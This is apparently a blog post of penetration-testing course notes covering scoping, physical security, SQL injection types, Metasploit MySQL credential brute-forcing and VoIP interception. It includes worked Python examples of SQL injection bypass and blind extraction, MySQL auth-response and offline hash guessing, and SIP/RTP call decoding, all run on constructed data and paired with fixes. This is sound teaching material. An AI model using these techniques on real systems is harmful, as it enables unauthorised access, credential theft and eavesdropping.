Introduction to Penetration Testing

Penetration testing is the post-information-gathering phase in which we exploit the vulnerabilities discovered in the vulnerability assessment (VA) phase.
Mobile PT: Mobile Security Framework (MobSF) for .apk (Android) and .ipa (iOS) packages.
Documentation: Digital Security Report

Ethics of a Penetration Tester
1. Nothing outside the agreed scope is touched.
2. You are a hacker, not a hero.
3. Documentation is read by developers, not the CEO, so make it concrete and actionable.
4. Read the code of conduct and make sure you do not do anything beyond the agreed scope.

Penetration Testing Methodologies
1. Web-based pen testing: scope + information gathering + exploitation + report of remediations + applying the patch through the company's own team.
2. Network and mobile pen testing.
3. Process or governance testing: read the policies, contracts, vendor agreements and so on + find loopholes in the clauses + report and identify them to high-level management + draft a new policy.

ISO 27001 compliance: read the standard.

Scope Analysis
Step 1: Query for VAPT (vulnerability assessment and penetration testing)
Step 2: Scoping document (web / network / mobile)
Step 3: Response meeting
Step 4: Proposal with price and per-man-day cost
Step 5: Acceptance and start date for the project.

Customer and Legal Agreements
-> Code of conduct signing
-> NDA: Non-Disclosure Agreement
-> MOU: Memorandum of Understanding

Pen Testing Planning and Scheduling

VA: Web, Network, Mobile, Compliance

PT: Web, Network, Mobile, Compliance

Start date: 21st Jan 2016 to 26th Jan 2016

Total number of days: 6 man-days
Green zone (testing window): 2 days per week (Saturday, Sunday) over 2 to 3 weeks
Night shift: 8:00 PM to 3:00 AM Monday; close 422 servers in this window

Sr. resource: RM -> single point of contact for the client.

Pre Pen Testing Checklist
1. License requirements (to be confirmed)
2. List of tools to be used in the testing
3. Team listing and tracking

Types of Pen Testing
-> Internal: network pen testing and internal application-layer pen testing, in which we audit and test all network assets of the organisation along with all in-house web applications that run over the internal network.

-> External: web application testing + pen testing through the company VPN.

-> White box: the scope is fully known: which OS runs on each machine, open ports, service pack levels, kernel versions, which hosts are critical and which are not, service versions, application source code, and so on.

-> Grey box: for network PT, a list of IP addresses and host names, nothing more; for web PT, the subdomain names, nothing more.

-> Black box: only the website / IP list in scope.


Physical Security Penetration Testing
After the logical (virtual) security audits, major corporations may not spend much budget or many resources on ensuring that the physical environment is secure. Hence auditing physical security again can be a big task for these organisations.

Major organisations which need physical security:
– Nuclear power plants
– Space stations
– Hydrogen experimental sites
– Data control centres
etc.

Physical Security Checklist Areas
1. Organisation surroundings
2. Ensure the people in the organisation follow the physical security rules:
– They must use ID cards for authentication
– There must be a log of all in-out activities
– There should be a physical security resource (team) monitoring the in-out movement of employees 24x7
– The reason for a visit should be validated

Checklist for entering the server room
-> Name of the visitor
-> Company of the visitor
-> Scanned copy of the visitor's company ID card
-> Government ID (Aadhaar card, driving licence, etc.)
-> Name of the person who is bringing the visitor in
-> Company he belongs to
-> ID card number
-> Devices they are carrying
-> Hand over your phone, switched off, to the gatekeeper
-> You are given the locker key in return

Physical security checklist within the working space
– Clean desk policy
– After a meeting, once all the discussion and planning is done and before you leave the discussion room, wipe the whiteboard or glass on which you wrote anything about the tasks to be executed.
– Shred every document before throwing it in the dustbin.

Dumpster diving: the process in which an attacker sneaks into the garbage of a home or organisation and looks for anything of value.

– Make sure people in the organisation do not write any kind of information on sticky notes or on their desks with marker or pen.

Serious Security Checklist
1. There must be fire extinguishers in all rooms and areas of the organisation.
2. There must be an AMC (annual maintenance contract) with the fire safety company.
3. There must be biometric authentication on the server room.
4. There must be cameras inside the server room.
5. The electricity room and the generator room should be at separate locations.

ISO 27001 : Physical Security Control List


Database Penetration Testing
1. Authentication bypass
2. Union-based SQL injection
3. Blind SQL injection
4. Error-based SQL injection
5. Time-based SQL injection
6. Double-query SQL injection
7. Stacked-query SQL injection
8. Header-based SQL injection (payload delivered in an HTTP header such as User-Agent or Cookie)
9. Second-order SQL injection
10. Boolean-based SQL injection
11. XPath injection
12. LDAP injection
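Added example (not code from the original page): three entries from the list above, authentication bypass, union-based and boolean-based blind injection, run against a constructed in-memory SQLite database, with the parameterised query that closes the hole beside the vulnerable one. The users/products tables and their contents are invented for this example. SQLite has no sleep() function, so time-based injection is not shown, and Python's sqlite3 refuses more than one statement per execute(), so stacked queries fail here even though the string concatenation would allow them on other drivers.

```python
import sqlite3


def make_db():
    # Constructed sample database for this example (not from the original page).
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users(username, password, role) VALUES
            ('admin', 's3cr3t-admin', 'admin'),
            ('alice', 'wonderland', 'user');
        CREATE TABLE products(id INTEGER PRIMARY KEY, name TEXT, price REAL);
        INSERT INTO products(name, price) VALUES ('widget', 9.99), ('gadget', 19.99);
    """)
    return con


def login_vulnerable(con, username, password):
    # Attacker-controlled text is pasted straight into the statement.
    sql = (f"SELECT username, role FROM users "
           f"WHERE username = '{username}' AND password = '{password}'")
    return con.execute(sql).fetchone()


def login_safe(con, username, password):
    # Parameterised query: the driver sends the values separately from the SQL text,
    # so a quote or comment marker in the input is just data.
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


def product_vulnerable(con, product_id):
    # Numeric parameter concatenated without quotes: no quote is needed to break out.
    return con.execute(f"SELECT name, price FROM products WHERE id = {product_id}").fetchall()


def auth_bypass(con):
    # 1. Authentication bypass: close the string and comment out the password check.
    #    Resulting SQL: ... WHERE username = 'admin'--' AND password = 'anything'
    return login_vulnerable(con, "admin'--", "anything")


def union_dump(con):
    # 2. Union-based: append a SELECT with the same column count (2) to pull rows
    #    from another table into the product listing.
    return product_vulnerable(con, "1 UNION SELECT username, password FROM users")


def boolean_blind_extract(con, inner_query, max_len=32):
    # 10. Boolean-based blind: the page only leaks "row returned / no row", so we
    #     extract the result of inner_query one character at a time with a binary
    #     search over the printable ASCII range (about 7 requests per character).
    def oracle(cond):
        return len(product_vulnerable(con, f"1 AND ({cond})")) == 1

    result = ""
    for pos in range(1, max_len + 1):
        if not oracle(f"length(({inner_query})) >= {pos}"):
            break                                   # reached the end of the value
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({inner_query}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result


if __name__ == "__main__":
    db = make_db()
    print("bypass:", auth_bypass(db))
    print("union :", union_dump(db))
    print("blind :", boolean_blind_extract(db, "SELECT password FROM users WHERE username = 'admin'"))
    print("safe  :", login_safe(db, "admin'--", "anything"))
```

The blind extraction is the same loop a tool such as sqlmap automates; the difference between the vulnerable and safe login functions is only where the user input enters the query, which is the remediation the report should ask the developers for.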

Target database: MySQL 5.0.45 Community Edition (for MS-SQL the equivalent Metasploit modules live under auxiliary/scanner/mssql/)
MySQL default port: 3306

Step 1: Scan the system with nmap and identify the database port and its version.
nmap -A <target IP>

Step 2: In msfconsole, select the version scanner: use auxiliary/scanner/mysql/mysql_version
Step 3: info
Step 4: set RHOSTS <target IP>  (use setg RHOSTS to carry the value across modules)
Step 5: run
Step 6: use auxiliary/scanner/mysql/mysql_login  (set RHOSTS again unless setg was used)
Step 7: set USER_FILE /root/Desktop/usernames.lst
Step 8: set PASS_FILE /root/Desktop/passwords.lst
Step 9: run
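Added example (not code from the original page or from Metasploit) showing what the two modules above actually do on the wire: mysql_version reads the server's initial handshake packet, and mysql_login answers its 20-byte scramble with the mysql_native_password response for every username/password pair. The handshake packets here are constructed in the script (one laid out as a 5.0-era server without plugin auth, one as a 5.5+ server that names the auth plugin); the version strings, connection ids and scramble bytes are sample values.

```python
import hashlib
import struct

CLIENT_SECURE_CONNECTION = 0x00008000   # server sends the 20-byte scramble in two parts
CLIENT_PLUGIN_AUTH = 0x00080000         # server names its auth plugin (5.5 and later)


def build_handshake(server_version, conn_id, scramble, caps, plugin=b"mysql_native_password"):
    """Build a protocol-10 Initial Handshake packet (constructed sample for this example)."""
    assert len(scramble) == 20
    body = bytes([10]) + server_version.encode() + b"\x00"  # protocol version, server version
    body += struct.pack("<I", conn_id)                       # connection id
    body += scramble[:8] + b"\x00"                            # auth-plugin-data part 1 + filler
    body += struct.pack("<H", caps & 0xFFFF)                  # capability flags, lower 16 bits
    body += bytes([0x21])                                     # character set utf8_general_ci
    body += struct.pack("<H", 0x0002)                         # status flags: SERVER_STATUS_AUTOCOMMIT
    body += struct.pack("<H", caps >> 16)                     # capability flags, upper 16 bits
    body += bytes([len(scramble) + 1 if caps & CLIENT_PLUGIN_AUTH else 0])
    body += b"\x00" * 10                                      # reserved
    body += scramble[8:] + b"\x00"                            # auth-plugin-data part 2 + NUL
    if caps & CLIENT_PLUGIN_AUTH:
        body += plugin + b"\x00"
    return struct.pack("<I", len(body))[:3] + b"\x00" + body  # 3-byte length, sequence id 0


def parse_handshake(pkt):
    """Parse the server greeting: this is where mysql_version gets the version string."""
    length = int.from_bytes(pkt[:3], "little")
    p = pkt[4:4 + length]
    if p[0] != 10:
        raise ValueError(f"unsupported protocol version {p[0]}")
    end = p.index(b"\x00", 1)
    version = p[1:end].decode()
    pos = end + 1
    conn_id = struct.unpack_from("<I", p, pos)[0]
    pos += 4
    scramble = p[pos:pos + 8]
    pos += 8 + 1                                              # part 1, then the filler byte
    cap_lo = struct.unpack_from("<H", p, pos)[0]
    pos += 2
    charset = p[pos]
    pos += 1
    status = struct.unpack_from("<H", p, pos)[0]
    pos += 2
    cap_hi = struct.unpack_from("<H", p, pos)[0]
    pos += 2
    caps = cap_lo | (cap_hi << 16)
    auth_len = p[pos]
    pos += 1 + 10                                             # length byte, then reserved bytes
    plugin = None
    if caps & CLIENT_SECURE_CONNECTION:
        part2_len = max(13, auth_len - 8)
        scramble += p[pos:pos + part2_len][:12]               # 12 scramble bytes, then a NUL
        pos += part2_len
    if caps & CLIENT_PLUGIN_AUTH:
        plugin = p[pos:p.index(b"\x00", pos)].decode()
    return {"version": version, "conn_id": conn_id, "scramble": scramble,
            "caps": caps, "charset": charset, "status": status, "plugin": plugin}


def password_hash(password):
    """What mysql.user stores for mysql_native_password: '*' + hex(SHA1(SHA1(pw)))."""
    stage2 = hashlib.sha1(hashlib.sha1(password.encode()).digest()).hexdigest()
    return "*" + stage2.upper()


def native_password_response(password, scramble):
    """Client side: SHA1(pw) XOR SHA1(scramble || SHA1(SHA1(pw))). This 20-byte blob is
    what mysql_login sends for each guess; an empty password sends an empty response."""
    if not password:
        return b""
    stage1 = hashlib.sha1(password.encode()).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mix = hashlib.sha1(scramble + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mix))


def server_check(stored_hash, scramble, response):
    """Server side: recover SHA1(pw) from the response and check SHA1 of it against the store."""
    stage2 = bytes.fromhex(stored_hash.lstrip("*"))
    mix = hashlib.sha1(scramble + stage2).digest()
    stage1 = bytes(a ^ b for a, b in zip(response, mix))
    return hashlib.sha1(stage1).digest() == stage2


def guess_password(stored_hash, wordlist):
    """Offline equivalent of mysql_login once a hash has been dumped: no scramble, no lockout."""
    return next((w for w in wordlist if password_hash(w) == stored_hash), None)
```

Two things worth noticing from the code: the server never sees the password, only SHA1(pw) masked by a per-connection value, so a sniffed response cannot be replayed against a fresh scramble; but anyone who obtains the stored hash can unmask SHA1(pw) from a captured response and, more simply, crack the unsalted double-SHA1 offline with a wordlist, which is why a dumped mysql.user table is treated as a credential leak.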

VoIP Pentesting: Voice over Internet Protocol.
It is the process in which we try to sniff the voice packets and conversations within an organisation that uses VoIP devices for internal communication.

Avaya: a widely deployed brand in VoIP communication.*

Put a call through VoIP -> target
Attacker: intercept via Cain & Abel, whose sniffer has a SIP/RTP (VoIP) interception facility that captures the signalling and records the RTP audio streams.
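Added example (not code from the original page or from Cain & Abel) of the two things a VoIP sniffer has to do: read the SIP INVITE to learn who is calling whom and where the audio will be sent (the SDP body carries the RTP address, port and codec in the clear), then decode the RTP packets on that port to recover the audio payload. The INVITE, extensions, addresses and RTP packet below are constructed sample data.

```python
import struct

# Constructed SDP body: announces where the caller will receive RTP audio.
SDP = (
    "v=0\r\n"
    "o=alice 2890844526 2890844526 IN IP4 10.0.0.10\r\n"
    "s=internal call\r\n"
    "c=IN IP4 10.0.0.10\r\n"
    "t=0 0\r\n"
    "m=audio 16384 RTP/AVP 0 8\r\n"
    "a=rtpmap:0 PCMU/8000\r\n"
    "a=rtpmap:8 PCMA/8000\r\n"
)


def build_invite(sdp=SDP):
    """Constructed SIP INVITE from extension 2001 to 2002 (sample data for this example)."""
    headers = (
        "INVITE sip:2002@10.0.0.20 SIP/2.0\r\n"
        "Via: SIP/2.0/UDP 10.0.0.10:5060;branch=z9hG4bK776asdhds\r\n"
        "From: \"Alice\" <sip:2001@10.0.0.10>;tag=1928301774\r\n"
        "To: <sip:2002@10.0.0.20>\r\n"
        "Call-ID: a84b4c76e66710@10.0.0.10\r\n"
        "CSeq: 314159 INVITE\r\n"
        "Content-Type: application/sdp\r\n"
        f"Content-Length: {len(sdp.encode())}\r\n"
    )
    return (headers + "\r\n" + sdp).encode()


def parse_sip_invite(raw):
    """Pull out what a sniffer needs: the parties, the call id, and the RTP endpoint/codecs."""
    head, _, body = raw.decode().partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")       # split on the first colon only
        headers[name.strip().lower()] = value.strip()
    body = body[:int(headers.get("content-length", len(body)))]
    info = {"method": lines[0].split(" ")[0],
            "from": headers.get("from"), "to": headers.get("to"),
            "call_id": headers.get("call-id"),
            "media_ip": None, "media_port": None, "codecs": {}}
    for line in body.split("\r\n"):
        if line.startswith("c=IN IP4 "):
            info["media_ip"] = line.split()[2]         # connection address for the media
        elif line.startswith("m=audio "):
            info["media_port"] = int(line.split()[1])  # UDP port the RTP audio arrives on
        elif line.startswith("a=rtpmap:"):
            pt, codec = line[len("a=rtpmap:"):].split(" ", 1)
            info["codecs"][int(pt)] = codec            # payload type -> codec name
    return info


def build_rtp(seq, timestamp, ssrc, payload, payload_type=0):
    """Minimal RTP packet: version 2, no padding, extension or CSRC list, marker clear."""
    return bytes([0x80, payload_type & 0x7F]) + struct.pack(">HII", seq, timestamp, ssrc) + payload


def parse_rtp(pkt):
    """Decode the 12-byte RTP header; the payload is the raw audio a sniffer writes to disk."""
    if len(pkt) < 12 or pkt[0] >> 6 != 2:
        raise ValueError("not an RTP version 2 packet")
    csrc_count = pkt[0] & 0x0F
    seq, ts, ssrc = struct.unpack(">HII", pkt[2:12])
    return {"marker": bool(pkt[1] & 0x80), "payload_type": pkt[1] & 0x7F,
            "seq": seq, "timestamp": ts, "ssrc": ssrc,
            "payload": pkt[12 + 4 * csrc_count:]}
```

With the codec map from the SDP, every RTP packet whose payload type is 0 is 8 kHz G.711 u-law, so concatenating payloads in sequence-number order and wrapping them in a WAV header gives a playable recording; that is all the interception facility mentioned above has to do once it sees the signalling and the media on the same network segment, which is why VoIP traffic should be segregated and encrypted (SIP over TLS and SRTP).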

VPN Pentesting
A VPN encrypts the packets leaving a device; VPN pen testing tests that tunnel and its endpoints.

3 comments on "Introduction to Penetration Testing"
  1. I found your blog site on Google and examined just a few of your early posts. Continue to keep up the superb work. I simply added your RSS feed to my MSN Information Reader. Looking forward to reading more from you later!…

  2. Jada Hegge says:

    Super-Duper site! I am loving it!! Will be back later to read some more. I am bookmarking your feeds also

  3. I am just writing to make you aware of what a useful experience our princess had using the blog. She picked up numerous things, including what it's like to possess a marvelous coaching mindset to get other folks to easily understand certain multifaceted subject matter. You truly exceeded readers' desires. Thanks for giving the beneficial, trusted, explanatory as well as easy tips about that topic to Evelyn.
